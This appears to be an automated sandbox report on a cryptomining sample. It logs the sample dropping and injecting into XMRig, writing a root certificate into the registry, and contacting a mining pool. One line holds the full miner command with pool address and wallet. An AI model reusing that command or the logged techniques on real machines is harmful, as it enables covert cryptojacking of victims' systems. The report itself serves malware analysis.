memory/3148-26-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-27-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-28-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-29-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-30-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-31-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-32-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-33-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-34-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-35-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-36-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-37-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-38-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-39-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-40-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-41-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-42-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-43-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-44-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-45-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-46-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-47-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-48-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-49-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-50-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-51-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-52-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-53-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-54-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-55-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-56-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-57-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-58-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-59-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-60-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-61-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-62-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-63-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-64-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-65-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-66-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-67-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-68-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-69-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-70-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-71-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-72-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-73-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-74-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-75-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-76-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-77-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-78-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-79-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-80-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-81-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-82-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-83-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-84-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:03
Platform
win10v2004-20240426-en
Max time kernel
1800s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1972 wrote to memory of 5324 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1972 wrote to memory of 5324 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/5324-16-0x000001B4712A0000-0x000001B4712C0000-memory.dmp
memory/5324-17-0x000001B472BA0000-0x000001B472BC0000-memory.dmp
memory/5324-18-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-21-0x000001B472BC0000-0x000001B472BE0000-memory.dmp
memory/5324-20-0x000001B472BE0000-0x000001B472C00000-memory.dmp
memory/5324-19-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-22-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-23-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-24-0x000001B472BE0000-0x000001B472C00000-memory.dmp
memory/5324-25-0x000001B472BC0000-0x000001B472BE0000-memory.dmp
memory/5324-26-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-27-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-28-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-29-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-30-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-31-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-32-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-33-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-34-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-35-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-36-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-37-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-38-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-39-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-40-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-41-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-42-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-43-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-44-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-45-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-46-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-47-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-48-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-49-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-50-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-51-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-52-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-53-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-54-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-55-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-56-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-57-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-58-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-59-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-60-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-61-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-62-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-63-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-64-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-65-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-66-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-67-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-68-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-69-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-70-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-71-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-72-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-73-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-74-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-75-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-76-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-77-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-78-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-79-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-80-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-81-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-82-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-83-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
memory/5324-84-0x00007FF7E2E60000-0x00007FF7E3963000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:03
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy 